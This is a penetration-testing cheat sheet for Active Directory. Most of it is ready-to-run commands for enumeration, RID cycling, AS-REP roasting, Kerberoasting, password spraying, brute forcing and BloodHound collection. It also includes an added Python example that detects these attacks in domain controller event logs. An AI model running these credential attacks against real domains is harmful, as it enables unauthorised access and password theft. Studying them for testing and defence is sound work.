Active Directory

AD Enumeration

Basic Recon

netexec smb <target>
enum4linux -a <target>
nmap -n -sV --script "ldap* and not brute" -p 389 <target>

Shares

# null session
netexec smb <IP> -u '' -p '' --shares
# guest
netexec smb <IP> -u 'guest' -p '' --shares

User Enumeration

kerbrute userenum -d <domain> [--dc <target>] users.txt
netexec smb <target> [-u 'guest' -p ''] --users
rpcdump.py [[domain/]guest:@]<target>

RID Cycling

netexec smb [-u 'guest' -p ''] --rid-brute <target>
lookupsid.py [-no-pass] [[domain/]guest:@]<target>

AS-REP Roast

With a valid username list

GetNPUsers.py -no-pass -usersfile valid_users.txt <domain>/

With valid credentials

GetNPUsers.py '<domain>/<user>:<password>' -request
netexec ldap <target> -u '<user>' -p '<password>' --asreproast asreproast.txt

Kerberoast

If you get this error from Linux: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great), the cause is your local clock: the KDC rejects requests whose timestamp is too far from its own, so you need to synchronise the host with the DC first. There are a few options:

ntpdate <target>
rdate -n <target>

Once the clocks agree, request the service tickets:

GetUserSPNs.py -request [-dc-ip <target>] <domain>/<user>:<password>
netexec ldap <target> -u '<user>' -p '<password>' --kerberoasting kerberoasting.txt

Password Spraying / Brute Forcing

Password spraying

netexec smb <target> -u valid_users.txt -p '<password>'
kerbrute passwordspray -d <domain> [--dc <target>] valid_users.txt '<password>'

Brute forcing

netexec smb <target> -u valid_users.txt -p passwords.txt
kerbrute bruteuser -d <domain> [--dc <target>] passwords.txt '<user>'
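The AS-REP roast, Kerberoast and spraying/brute-force commands above each leave a recognisable footprint in the domain controller's Security log: 4768 (TGT requested) with pre-authentication type 0 and an RC4 ticket, 4769 (service ticket requested) with RC4 tickets for several SPN accounts in a burst, and 4771 (pre-authentication failed) with failure code 0x18 spread across many accounts from one source or repeated against one account. The following is an added example of the detection side, not code from PwnBook; it assumes the events have already been mapped from EVTX into plain dicts with the field names shown, and the sample records are constructed.

```python
from collections import defaultdict

# Constructed sample records (not from a real DC). Each dict carries the
# fields of a Security event that the checks below read: EventID, target user,
# source IP, pre-auth type, ticket encryption type, service name, failure
# status and a timestamp in seconds. Mapping real EVTX/XML onto this shape is
# assumed to be done by the log pipeline.
EVENTS = [
    # 4768 with no pre-authentication and an RC4 ticket: AS-REP roast signature
    {"id": 4768, "user": "svc_backup", "ip": "10.0.0.50", "preauth": 0, "etype": 0x17, "svc": "krbtgt", "t": 100},
    {"id": 4768, "user": "alice", "ip": "10.0.0.20", "preauth": 2, "etype": 0x12, "svc": "krbtgt", "t": 101},
    # 4769 RC4 service tickets for several SPN accounts from one principal in a burst: Kerberoast
    {"id": 4769, "user": "bob", "ip": "10.0.0.50", "etype": 0x17, "svc": "svc_sql", "t": 110},
    {"id": 4769, "user": "bob", "ip": "10.0.0.50", "etype": 0x17, "svc": "svc_web", "t": 111},
    {"id": 4769, "user": "bob", "ip": "10.0.0.50", "etype": 0x17, "svc": "svc_exch", "t": 112},
    {"id": 4769, "user": "alice", "ip": "10.0.0.20", "etype": 0x12, "svc": "FS01$", "t": 113},
    # 4771 with status 0x18 (bad password), one source, one attempt per user: spray
    *[{"id": 4771, "user": u, "ip": "10.0.0.50", "status": 0x18, "t": 200 + i}
      for i, u in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"])],
    # same event, one user hit repeatedly from one source: brute force
    *[{"id": 4771, "user": "admin", "ip": "10.0.0.77", "status": 0x18, "t": 300 + i}
      for i in range(6)],
]

RC4_HMAC = 0x17               # ticket encryption type that is crackable offline
KDC_ERR_PREAUTH_FAILED = 0x18  # 4771 failure code for a wrong password


def asrep_roast_candidates(events):
    """Accounts issued a TGT with pre-auth type 0 and an RC4 ticket (event 4768)."""
    return sorted({e["user"] for e in events
                   if e["id"] == 4768 and e.get("preauth") == 0 and e["etype"] == RC4_HMAC})


def kerberoast_bursts(events, min_services=3, window=60):
    """(user, ip) pairs that pulled RC4 service tickets for at least
    min_services distinct non-machine SPN accounts inside one fixed window (4769)."""
    buckets = defaultdict(set)
    for e in events:
        if e["id"] != 4769 or e["etype"] != RC4_HMAC:
            continue
        if e["svc"] == "krbtgt" or e["svc"].endswith("$"):
            continue  # TGT renewals and machine accounts are normal noise
        buckets[(e["user"], e["ip"], e["t"] // window)].add(e["svc"])
    return {(u, ip): svcs for (u, ip, _), svcs in buckets.items() if len(svcs) >= min_services}


def _preauth_failures(events):
    return [e for e in events if e["id"] == 4771 and e.get("status") == KDC_ERR_PREAUTH_FAILED]


def password_spray_sources(events, min_users=5, window=300):
    """Source IPs with bad-password failures against at least min_users distinct
    accounts in one fixed window: the spray pattern (few tries, many users)."""
    buckets = defaultdict(set)
    for e in _preauth_failures(events):
        buckets[(e["ip"], e["t"] // window)].add(e["user"])
    return {ip: sorted(users) for (ip, _), users in buckets.items() if len(users) >= min_users}


def brute_force_targets(events, min_attempts=5, window=300):
    """(ip, user) pairs with at least min_attempts bad-password failures in one
    fixed window: the brute-force pattern (many tries, one user)."""
    counts = defaultdict(int)
    for e in _preauth_failures(events):
        counts[(e["ip"], e["user"], e["t"] // window)] += 1
    return {(ip, u): n for (ip, u, _), n in counts.items() if n >= min_attempts}


if __name__ == "__main__":
    print("AS-REP roast candidates:", asrep_roast_candidates(EVENTS))
    print("Kerberoast bursts:", kerberoast_bursts(EVENTS))
    print("Spray sources:", password_spray_sources(EVENTS))
    print("Brute-force targets:", brute_force_targets(EVENTS))
```

Fixed-window bucketing (`t // window`) keeps the example short; a production rule would use a sliding window so a burst straddling a bucket boundary is not split. The thresholds are assumptions to tune per environment, and the RC4 filter on 4769 loses its value once RC4 is disabled domain-wide, at which point the burst of distinct SPN requests from one principal is the remaining signal.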

BloodHound

BloodHound Python

# legacy
bloodhound-python -d '<domain>' -u '<user>' -p '<password>' [-ns '<nameserver>'] -c All --zip
# community edition
bloodhound-ce-python -d '<domain>' -u '<user>' -p '<password>' [-ns '<nameserver>'] -c All --zip

Netexec

netexec ldap <target> -u '<user>' -p '<password>' --bloodhound -c All

SharpHound

https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors

# exe
.\SharpHound.exe -CollectionMethods All
# ps1
. .\SharpHound.ps1; Invoke-BloodHound -CollectionMethods All -OutputDirectory .
